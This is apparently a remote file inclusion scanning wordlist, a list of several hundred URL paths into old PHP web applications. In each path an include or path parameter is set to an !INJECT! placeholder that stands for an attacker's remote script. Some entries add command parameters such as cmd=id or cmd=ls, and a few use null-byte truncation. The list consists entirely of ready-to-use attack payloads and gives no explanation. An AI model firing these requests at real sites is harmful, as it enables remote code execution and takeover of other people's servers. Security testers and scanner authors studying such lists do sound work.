/lib/Loggix/Module/Calendar.php?pathToIndex=!INJECT!
/lib/Loggix/Module/Comment.php?pathToIndex=!INJECT!
/lib/Loggix/Module/Rss.php?pathToIndex=!INJECT!
/lib/Loggix/Module/Trackback.php?pathToIndex=!INJECT!
/lib/action/rss.php?lib=!INJECT!?
/lib/activeutil.php?set[include_path]=!INJECT!?
/lib/addressbook.php?GLOBALS[basedir]=!INJECT!
/lib/armygame.php?libpath=!INJECT!
/lib/authuser.php?root=!INJECT!
/lib/base.php?BaseCfg[BaseDir]=!INJECT!
/lib/connect.php?root=!INJECT!
/lib/connected_users.lib.php3?ChatPath=!INJECT!
/lib/connected_users.lib.php3?ChatPath=!INJECT!?
/lib/db/mysql.class.php?root=!INJECT!
/lib/db/postgres.class.php?root=!INJECT!
/lib/functions.php?DOC_ROOT=!INJECT!
/lib/googlesearch/GoogleSearch.php?APP[path][lib]=!INJECT!?
/lib/header.php?DOC_ROOT=!INJECT!
/lib/language.php?_LIB_DIR=!INJECT!
/lib/live_status.lib.php?ROOT=!INJECT!
/lib/misc.php?root=!INJECT!
/lib/nl/nl.php?g_strRootDir=!INJECT!
/lib/obj/collection.class.php?GLOBALS[application][app_root]=!INJECT!
/lib/obj/content_image.class.php?GLOBALS[application][app_root]=!INJECT!
/lib/pcltar.lib.php?g_pcltar_lib_dir=!INJECT!
/lib/pcltrace.lib.php?g_pcltar_lib_dir=!INJECT!
/lib/rs.php?rootpath=!INJECT!
/lib/selectlang.php?BBC_LANGUAGE_PATH=!INJECT!
/lib/smarty/SmartyFU.class.php?system[smarty][dir]=!INJECT!?
/lib/static/header.php?set_menu=!INJECT!
/lib/tpl.inc.php?conf[classpath]=!INJECT!
/libraries/comment/postComment.php?path[cb]=!INJECT!?a=
/libraries/database.php?path=!INJECT!???
/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=!INJECT!
/libraries/pcl/pcltar.php?g_pcltar_lib_dir=!INJECT!
/library/authorize.php?login_form=!INJECT!?
/library/translation.inc.php?GLOBALS[srcdir]=!INJECT!?
/libs/db.php?path_local=!INJECT!
/libs/ftp.php?path_local=!INJECT!
/libs/lom.php?ETCDIR=!INJECT!
/libsecure.php?abs_path=!INJECT!?
/license.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/link_main.php?phpbb_root_path=!INJECT!
/linkadmin.php?page=!INJECT!?
/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=!INJECT!?
/list.php?phpbb_root_path=!INJECT!
/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=!INJECT!
/lms_path/modules/welcome.php?_LIB_DIR=!INJECT!
/load_lang.php?_SERWEB[configdir]=!INJECT!
/load_lang.php?_SERWEB[serwebdir]=!INJECT!
/load_phplib.php?_PHPLIB[libdir]=!INJECT!
/loader.php?GLOBALS=!INJECT!
/local/lib/lcUser.php?LIBDIR=!INJECT!?
/log.php?bibtexrootrel=!INJECT!?
/login.php3?cl_headers=!INJECT!
/login.php?base_dir=!INJECT!
/login.php?blog_theme=!INJECT!
/login.php?langfile=!INJECT!
/login.php?pachtofile=!INJECT!
/login.php?srcdir=!INJECT!?
/login.php?value=!INJECT!??
/lovecms/install/index.php?step=!INJECT!?
/m2f/m2f_cron.php?m2f_root_path=!INJECT!
/m2f/m2f_forum.php?m2f_root_path=!INJECT!
/m2f/m2f_mailinglist.php?m2f_root_path=!INJECT!
/m2f/m2f_phpbb204.php?m2f_root_path=!INJECT!
/maguz.php?site=!INJECT!
/mail/childwindow.inc.php?form=!INJECT!?
/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=!INJECT!?
/mail_this_entry/mail_autocheck.php?pm_path=!INJECT!?&cmd=ls
/main.inc.php?pathtoscript=!INJECT!
/main.php?config[search_disp]=true&include_dir=!INJECT!
/main.php?id=!INJECT!
/main.php?include_path=!INJECT!?
/main.php?pageURL=!INJECT!
/main.php?pagina=!INJECT!
/main/forum/komentar.php?site_path=!INJECT!
/main/main.php?pi=!INJECT!
/main/ppcbannerclick.php?INC=!INJECT!?
/main/ppcclick.php?INC=!INJECT!?
/main_prepend.php?_SERWEB[functionsdir]=!INJECT!
/mainpage.php?docroot=!INJECT!?cmd
/mamboleto.php?mosConfig_absolute_path=!INJECT!
/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=!INJECT!
/manage_songs.php?foing_root_path=!INJECT!
/manager/admin/index.php?MGR=!INJECT!
/manager/admin/p_ins.php?MGR=!INJECT!
/manager/admin/u_ins.php?MGR=!INJECT!
/manager/articles.php?_PX_config[manager_path]=!INJECT!
/manager/static/view.php?propID=0&INC=!INJECT!
/master.php?root_path=!INJECT!
/mcNews/admin/header.php?skinfile=!INJECT!
/mcf.php?content=!INJECT!
/mcnews/admin/install.php?l=!INJECT!
/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=!INJECT!
/member.php?vwar_root=!INJECT!
/member/usercp_menu.php?script_folder=!INJECT!
/members/index.php?INC=!INJECT!?
/members/registration.php?INC=!INJECT!?
/members_help.php?hlp=!INJECT!?
/membres/membreManager.php?include_path=!INJECT!?
/menu.php3?cl_headers=!INJECT!
/menu.php?functions_file=!INJECT!
/mep/frame.php?chem=!INJECT!?
/microcms/includes/file_manager/special.php?fm_includes_special=!INJECT!
/middle.php?file=!INJECT!
/migrateNE2toNE3.php?_NE[AbsPath]=!INJECT!
/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=!INJECT!?
/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=!INJECT!?
/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=!INJECT!?
/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=!INJECT!?
/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=!INJECT!?
/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=!INJECT!?
/mini-pub.php/front-end/img.php?sFileName=!INJECT!?
/minimal/wiki.php?page=!INJECT!?
/misc/function.php3?path=!INJECT!?
/mitglieder.php?config[root_ordner]=!INJECT!?&cmd=id
/mkportal/include/user.php?MK_PATH=!INJECT!
/mkportal/include/user.php?MK_PATH=!INJECT!?
/mod/authent.php4?rootpath=!INJECT!
/mod/image/index.php?config[pathMod]=!INJECT!
/mod/liens/index.php?config[pathMod]=!INJECT!
/mod/liste/index.php?config[pathMod]=!INJECT!
/mod/special/index.php?config[pathMod]=!INJECT!
/mod/texte/index.php?config[pathMod]=!INJECT!
/mod_membre/inscription.php?chemin=!INJECT!?
/mod_phpalbum/sommaire_admin.php?chemin=!INJECT!?
/modernbill/include/html/config.php?DIR=!INJECT!
/modifyform.html?code=!INJECT!
/mods/business_functions.php?GALLERY_BASEDIR=!INJECT!
/mods/config/load.inc.php?moddir=!INJECT!?
/mods/http/load.inc.php?moddir=!INJECT!?
/mods/ui_functions.php?GALLERY_BASEDIR=!INJECT!
/module/forum/forum.php?fd=!INJECT!=';
/module/forum/main.php?id=1&main_dir=!INJECT!?&
/modules.php?name=!INJECT!&file=article&sid=2
/modules/4nAlbum/public/displayCategory.php?basepath=!INJECT!
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=!INJECT!
/modules/Calendar/admin/update.php?calpath=!INJECT!?
/modules/Calendar/calendar.php?calpath=!INJECT!?
/modules/Calendar/scheme.php?calpath=!INJECT!?
/modules/Discipline/CategoryBreakdownTime.php?FocusPath=!INJECT!
/modules/Discipline/CategoryBreakdownTime.php?staticpath=!INJECT!
/modules/Discipline/StudentFieldBreakdown.php?staticpath=!INJECT!
/modules/Forums/admin/admin_styles.php?phpbb_root_path=!INJECT!
/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=!INJECT!
/modules/My_eGallery/index.php?basepath=!INJECT!
/modules/My_eGallery/public/displayCategory.php?basepath=!INJECT!
/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=!INJECT!?
/modules/NukeAI/util.php?AIbasedir=!INJECT!
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=!INJECT!
/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=!INJECT!
/modules/abook/foldertree.php?baseDir==!INJECT!?
/modules/addons/plugin.php?doc_root=!INJECT!
/modules/admin/include/config.php?doc_root=!INJECT!
/modules/admin/include/localize.php?doc_root=!INJECT!
/modules/agendax/addevent.inc.php?agendax_path=!INJECT!&cmd=id
/modules/bank/includes/design/main.inc.php?bank_data[root]=!INJECT!?
/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=!INJECT!
/modules/birstday/birst.php?exbb[home_path]=!INJECT!?
/modules/birstday/profile_show.php?exbb[home_path]=!INJECT!?
/modules/birstday/select.php?exbb[home_path]=!INJECT!?
/modules/blocks/headerfile.php?system[path]=!INJECT!
/modules/calendar/index.php?inc_dir=!INJECT!
/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=!INJECT!?
/modules/calendar/mod_calendar.php?absolute_path=!INJECT!?
/modules/certinfo/index.php?full_path=!INJECT!
/modules/character_roster/include.php?mod_root=!INJECT!?
/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=!INJECT!?
/modules/coppermine/themes/default/theme.php?THEME_DIR=!INJECT!
/modules/downloads/lib/LM_Downloads.php?pathToIndex=!INJECT!
/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=!INJECT!
/modules/emails/index.php?full_path=!INJECT!
/modules/events/index.php?full_path=!INJECT!
/modules/fax/index.php?full_path=!INJECT!
/modules/files/blocks/latest_files.php?system[path]=!INJECT!
/modules/files/index.php?full_path=!INJECT!
/modules/files/list.php?full_path=!INJECT!
/modules/filters/headerfile.php?system[path]=!INJECT!
/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=!INJECT!?
/modules/forums/blocks/latest_posts.php?system[path]=!INJECT!
/modules/global/inc/content.inc.php?sIncPath=!INJECT!?
/modules/groupadm/index.php?full_path=!INJECT!
/modules/groups/headerfile.php?system[path]=!INJECT!
/modules/guestbook/index.php?CONFIG[local_root]=!INJECT!?
/modules/history/index.php?full_path=!INJECT!
/modules/home.module.php?repmod=!INJECT!?
/modules/horoscope/footer.php?xoopsConfig[root_path]=!INJECT!
/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=!INJECT!
/modules/info/index.php?full_path=!INJECT!
/modules/links/blocks/links.php?system[path]=!INJECT!
/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!
/modules/links/submit_links.php?rootdp=zZz&gsLanguage=!INJECT!
/modules/log/index.php?full_path=!INJECT!
/modules/mail/index.php?full_path=!INJECT!
/modules/menu/headerfile.php?system[path]=!INJECT!
/modules/messages/index.php?full_path=!INJECT!
/modules/mod_as_category.php?mosConfig_absolute_path=!INJECT!
/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=!INJECT!
/modules/mod_calendar.php?absolute_path=!INJECT!
/modules/mod_flatmenu.php?mosConfig_absolute_path=!INJECT!
/modules/mod_mainmenu.php?mosConfig_absolute_path=!INJECT!
/modules/mod_weather.php?absolute_path=!INJECT!?
/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=!INJECT!?
/modules/newbb_plus/config.php?bbPath[root_theme]=!INJECT!
/modules/newbb_plus/votepolls.php?bbPath[path]=!INJECT!
/modules/news/blocks/latest_news.php?system[path]=!INJECT!
/modules/newusergreatings/pm_newreg.php?exbb[home_path]=!INJECT!?
/modules/organizations/index.php?full_path=!INJECT!
/modules/phones/index.php?full_path=!INJECT!
/modules/pms/index.php?module_path=!INJECT!???
/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!
/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=!INJECT!?
/modules/presence/index.php?full_path=!INJECT!
/modules/projects/index.php?full_path=!INJECT!
/modules/projects/list.php?full_path=!INJECT!
/modules/projects/summary.inc.php?full_path=!INJECT!
/modules/punish/p_error.php?exbb[home_path]=!INJECT!?
/modules/punish/profile.php?exbb[home_path]=!INJECT!?
/modules/reports/index.php?full_path=!INJECT!
/modules/search/index.php?full_path=!INJECT!
/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!?
/modules/settings/headerfile.php?system[path]=!INJECT!
/modules/snf/index.php?full_path=!INJECT!
/modules/syslog/index.php?full_path=!INJECT!
/modules/tasks/index.php?full_path=!INJECT!
/modules/tasks/searchsimilar.php?full_path=!INJECT!
/modules/tasks/summary.inc.php?full_path=!INJECT!
/modules/threadstop/threadstop.php?exbb[home_path]=!INJECT!?
/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=!INJECT!
/modules/tml/block.tag.php?GLOBALS[PTH][classes]=!INJECT!
/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=!INJECT!
/modules/useradm/index.php?full_path=!INJECT!
/modules/users/headerfile.php?system[path]=!INJECT!
/modules/vWar_Account/includes/functions_common.php?vwar_root2=!INJECT!
/modules/visitors2/include/config.inc.php?lvc_include_dir=!INJECT!?
/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=!INJECT!
/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=!INJECT!
/modules/xfsection/modify.php?dir_module=!INJECT!
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=!INJECT!
/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=!INJECT!
/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=!INJECT!?
/modulistica/mdl_save.php?CLASSPATH=!INJECT!
/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=!INJECT!?
/moodle/admin/utfdbmigrate.php?cmd=!INJECT!
/moosegallery/display.php?type=!INJECT!?&cmd=[command]
/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=!INJECT!
/moteur/moteur.php?chemin=!INJECT!?
/movie_cls.php?full_path=!INJECT!
/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=!INJECT!
/music/buycd.php?HTTP_DOCUMENT_ROOT=!INJECT!?
/mutant_includes/mutant_functions.php?phpbb_root_path=!INJECT!
/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=!INJECT!
/mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=!INJECT!
/mygallery/myfunctions/mygallerybrowser.php?myPath=!INJECT!
/myphpcommander_path/system/lib/package.php?gl_root=!INJECT!?cmd
/mysave.php?file=!INJECT!
/naboard_pnr.php?skin=!INJECT!?
/ncaster/admin/addons/archive/archive.php?adminfolder=!INJECT!
/network_module_selector.php?path_prefix=!INJECT!
/news.php?CONFIG[script_path]=!INJECT!?
/news.php?config[root_ordner]=!INJECT!?&cmd=id
/news.php?scriptpath=!INJECT!?
/news.php?vwar_root=!INJECT!
/news/include/createdb.php?langfile;=!INJECT!?
/news/include/customize.php?l=!INJECT!?
/news/newstopic_inc.php?indir=!INJECT!
/news/scripts/news_page.php?script_path=!INJECT!?
/newsadmin.php?action=!INJECT!
/newsarchive.php?path_to_script=!INJECT!?&cmd=ls
/newsfeeds/includes/aggregator.php?zf_path=!INJECT!
/newsfeeds/includes/controller.php?zf_path=!INJECT!
/newsletter/newsletter.php?waroot=!INJECT!
/newsp/lib/class.Database.php?path=!INJECT!?
/newticket.php?lang=!INJECT!
/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=!INJECT!
/noticias.php?inc=!INJECT!?
/nucleus/plugins/skinfiles/index.php?DIR_LIBS=!INJECT!
/nuke_path/iframe.php?file=!INJECT!
/nukebrowser.php?filnavn=!INJECT!&filhead=!INJECT!&cmd=id
/nuseo/admin/nuseo_admin_d.php?nuseo_dir=!INJECT!?
/oaboard_en/forum.php?inc=!INJECT!
/ocp-103/index.php?req_path=!INJECT!
/ocs/include/footer.inc.php?fullpath=!INJECT!?
/ocs/include/theme.inc.php?fullpath=!INJECT!?
/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=!INJECT!?
/olbookmarks-0.7.4/themes/test1.php?!INJECT!
/oneadmin/adminfoot.php?path[docroot]=!INJECT!
/oneadmin/blogger/sampleblogger.php?path[docroot]=!INJECT!?
/oneadmin/config-bak.php?include_once=!INJECT!
/oneadmin/config.php?path[docroot]=!INJECT!
/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=!INJECT!?
/online.php?config[root_ordner]=!INJECT!?&cmd=id
/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=!INJECT!?
/openi-admin/base/fileloader.php?config[openi_dir]=!INJECT!
/openrat/themes/default/include/html/insert.inc.php?tpl_dir=!INJECT!???
/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=!INJECT!
/ops/gals.php?news_file=!INJECT!
/order/login.php?svr_rootscript=!INJECT!
/osData/php121/php121db.php?php121dir=!INJECT!%00
/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=!INJECT!?
/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=!INJECT!?
/owimg.php3?path=!INJECT!
/p-news.php?pn_lang=!INJECT!
/pafiledb/includes/pafiledb_constants.php?module_root_path=!INJECT!
/page.php?goto=!INJECT!
/page.php?id=!INJECT!
/panel/common/theme/default/header_setup.php?path[docroot]=!INJECT!
/param_editor.php?folder=!INJECT!?
/parse/parser.php?WN_BASEDIR=!INJECT!
/patch/?language_id=!INJECT!
/patch/tools/send_reminders.php?noSet=0&includedir=!INJECT!?
/paypalipn/ipnprocess.php?INC=!INJECT!?
/pda/pda_projects.php?offset=!INJECT!
/phfito/phfito-post?SRC_PATH=!INJECT!
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=!INJECT!
/photo_comment.php?toroot=!INJECT!
/php-inc/log.inc.php?SKIN_URL=!INJECT!
/php-include-robotsservices.php?page=!INJECT!
/php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=!INJECT!
/php.incs/common.inc.php?cm_basedir=!INJECT!?
/php/init.gallery.php?include_class=!INJECT!/something
/php121db.php?php121dir=!INJECT!%00
/php4you.php?dir=!INJECT!?
/phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=!INJECT!?
/phpBB2/shoutbox.php?phpbb_root_path=!INJECT!
/phpCards.header.php?CardPath=!INJECT!?
/phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=!INJECT!
/phpMyChat.php3?=!INJECT!?cmd=id
/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=!INJECT!?
/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=!INJECT!?
/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=!INJECT!
/phpbb/sendmsg.php?phpbb_root_path=!INJECT!
/phpcalendar/includes/calendar.php?phpc_root_path=!INJECT!?
/phpcalendar/includes/setup.php?phpc_root_path=!INJECT!?
/phpdebug_PATH/test/debug_test.php?debugClassLocation=!INJECT!
/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=!INJECT!
/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=!INJECT!
/phphd_downloads/common.php?phphd_real_path=!INJECT!
/phphost_directoryv2/include/admin.php?rd=!INJECT!?
/phphtml.php?htmlclass_path=!INJECT!
/phpi/edit_top_feature.php?include_connection=!INJECT!
/phpi/edit_topics_feature.php?include_connection=!INJECT!
/phplib/site_conf.php?ordnertiefe=!INJECT!
/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/module/referenz.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=!INJECT!
/phplinks/includes/smarty.php?full_path_to_public_program=!INJECT!
/phporacleview/inc/include_all.inc.php?page_dir=!INJECT!?
/phppc/poll.php?is_phppc_included=1&relativer_pfad=!INJECT!?
/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=!INJECT!?
/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=!INJECT!?
/phpquickgallery/gallery_top.inc.php?textFile=!INJECT!
/phpreactor/inc/polls.inc.php?pathtohomedir=!INJECT!?
/phpreactor/inc/updatecms.inc.php?pathtohomedir=!INJECT!?
/phpreactor/inc/users.inc.php?pathtohomedir=!INJECT!?
/phpreactor/inc/view.inc.php?pathtohomedir=!INJECT!?
/phpress/adisplay.php?lang=!INJECT!
/phpunity-postcard.php?plgallery_epost=1&gallery_path=!INJECT!?
/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=!INJECT!
/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=!INJECT!
/phpyabs/moduli/libri/index.php?Azione=!INJECT!
/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=!INJECT!
/playlist.php?phpbb_root_path=!INJECT!
/plugin/HP_DEV/cms2.php?s_dir=!INJECT!?
/plugin/gateway/gnokii/init.php?apps_path[plug]=!INJECT!?
/plugins/1_Adressbuch/delete.php?folder=!INJECT!
/plugins/BackUp/Archive.php?bkpwp_plugin_path=!INJECT!?
/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=!INJECT!?
/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=!INJECT!?
/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=!INJECT!?
/plugins/links/functions.inc?_CONF[path]=!INJECT!
/plugins/polls/functions.inc?_CONF[path]=!INJECT!
/plugins/rss_importer_functions.php?sitepath=!INJECT!?
/plugins/safehtml/HTMLSax3.php?dir[plugins]=!INJECT!?
/plugins/safehtml/safehtml.php?dir[plugins]=!INJECT!?
/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=!INJECT!
/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=!INJECT!
/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=!INJECT!
/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=!INJECT!
/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=!INJECT!
/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=!INJECT!
/plugins/spamx/Import.Admin.class.php?_CONF[path]=!INJECT!
/plugins/spamx/LogView.Admin.class.php?_CONF[path]=!INJECT!
/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=!INJECT!
/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=!INJECT!
/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=!INJECT!
/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=!INJECT!
/plugins/staticpages/functions.inc?_CONF[path]=!INJECT!
/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=!INJECT!
/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=!INJECT!
/plus.php?_pages_dir=!INJECT!?
/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=!INJECT!?
/pmi_v28/Includes/global.inc.php?strIncludePrefix=!INJECT!
/pmi_v28/Includes/global.inc.php?strIncludePrefix=!INJECT!?
/podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/login.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=!INJECT!
/podcastgen1.0beta2/core/archive_cat.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=!INJECT!
/podcastgen1.0beta2/core/recent_list.php?absoluteurl=!INJECT!
/poll/view.php?int_path=!INJECT!
/pollvote.php?pollname=!INJECT!?&cmd=ls
/pop.php?base=!INJECT!
/popup_window.php?site_isp_root=!INJECT!?
/port.php?content=!INJECT!
/portal/includes/portal_block.php?phpbb_root_path=!INJECT!
/portal/portal.php?phpbb_root_path=!INJECT!?
/portfolio.php?id=!INJECT!
/portfolio/commentaires/derniers_commentaires.php?rep=!INJECT!?
/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=!INJECT!
/prepare.php?xcart_dir=!INJECT!?
/prepend.php?_PX_config[manager_path]=!INJECT!
/preview.php?php_script_path=!INJECT!?&cmd=dir
/principal.php?conteudo=!INJECT!
/print.php?page=!INJECT!
/print.php?pager=!INJECT!
/print.php?print=!INJECT!?
/process.php?DEFAULT_SKIN=!INJECT!
/professeurs/index.php?repertoire_config=!INJECT!
/profil.php?config[root_ordner]=!INJECT!?&cmd=id
/projects/weatimages/demo/index.php?ini[langpack]=!INJECT!
/promocms/newspublish/include.php?path[bdocroot]=!INJECT!
/protection.php?logout_page=!INJECT!?
/provider/auth.php?xcart_dir=!INJECT!?
/psynch/nph-psa.exe?css=!INJECT!
/psynch/nph-psf.exe?css=!INJECT!
/public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=!INJECT!?
/public_html/modules/Forums/favorites.php?nuke_bb_root_path=!INJECT!?
/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=!INJECT!
/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=!INJECT!
/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=!INJECT!?
/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=!INJECT!?
/qte_web.php?qte_web_path=!INJECT!?
/quick_reply.php?phpbb_root_path=!INJECT!&mode=[file]
/quickie.php?QUICK_PATH=!INJECT!?&cmd=id
/random2.php?path_to_folder=!INJECT!
/randshop/index.php?incl=!INJECT!?
/rdf.php?page[path]=!INJECT!?&cmd=ls
/reactivate.php?base_dir=!INJECT!
/read.php?data=!INJECT!?
/readmore.php?config["sipssys"]=!INJECT!
/recent.php?insPath=!INJECT!
/rechnung.php?_PHPLIB[libdir]=!INJECT!?
/reconfig.php?GLOBALS[CLPath]=!INJECT!
/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=!INJECT!
/redirect.php?url=!INJECT!
/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=!INJECT!
/register.php?base_dir=!INJECT!
/releasenote.php?mosConfig_absolute_path=!INJECT!
/rempass.php?lang=!INJECT!
/report.php?scriptpath=!INJECT!?
/reports/who_r.php?bj=!INJECT!
/resources/includes/class.Smarty.php?cfg[sys][base_path]=!INJECT!
/ressourcen/dbopen.php?home=!INJECT!?
/robotstats.inc.php?DOCUMENT_ROOT=!INJECT!?
/root/public/code/cp_html2txt.php?page=!INJECT!
/routines/fieldValidation.php?jssShopFileSystem=!INJECT!
/rspa/framework/Controller_v4.php?__ClassPath=!INJECT!
/rspa/framework/Controller_v4.php?__ClassPath=!INJECT!?
/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=!INJECT!
/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=!INJECT!?
/rss.php?page[path]=!INJECT!?&cmd=ls
/rss.php?phpraid_dir=!INJECT!
/rss.php?premodDir=!INJECT!
/rss2.php?page[path]=!INJECT!?&cmd=ls
/run.php?dir=SHELL?&file=!INJECT!
/s01.php?shopid=!INJECT!
/s01.php?shopid=!INJECT!?
/s02.php?shopid=!INJECT!?
/s03.php?shopid=!INJECT!?
/s04.php?shopid=!INJECT!?
/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=!INJECT!
/sablonlar/gunaysoft/gunaysoft.php?sayfaid=!INJECT!
/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=!INJECT!
/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=!INJECT!?
/sample/xls2mysql/parser_path=!INJECT!?
/save.php?file_save=!INJECT!
/saveserver.php?thisdir=!INJECT!
/script//ident/index.php?path_inc=!INJECT!
/script/_conf/core/common-tpl-vars.php?confdir=!INJECT!?
/script/common.inc.php?path_inc=!INJECT!
/script/gestion/index.php?path_inc=!INJECT!
/script/ident/disconnect.php?path_inc=!INJECT!
/script/ident/ident.inc.php?path_inc=!INJECT!
/script/ident/identification.php?path_inc=!INJECT!
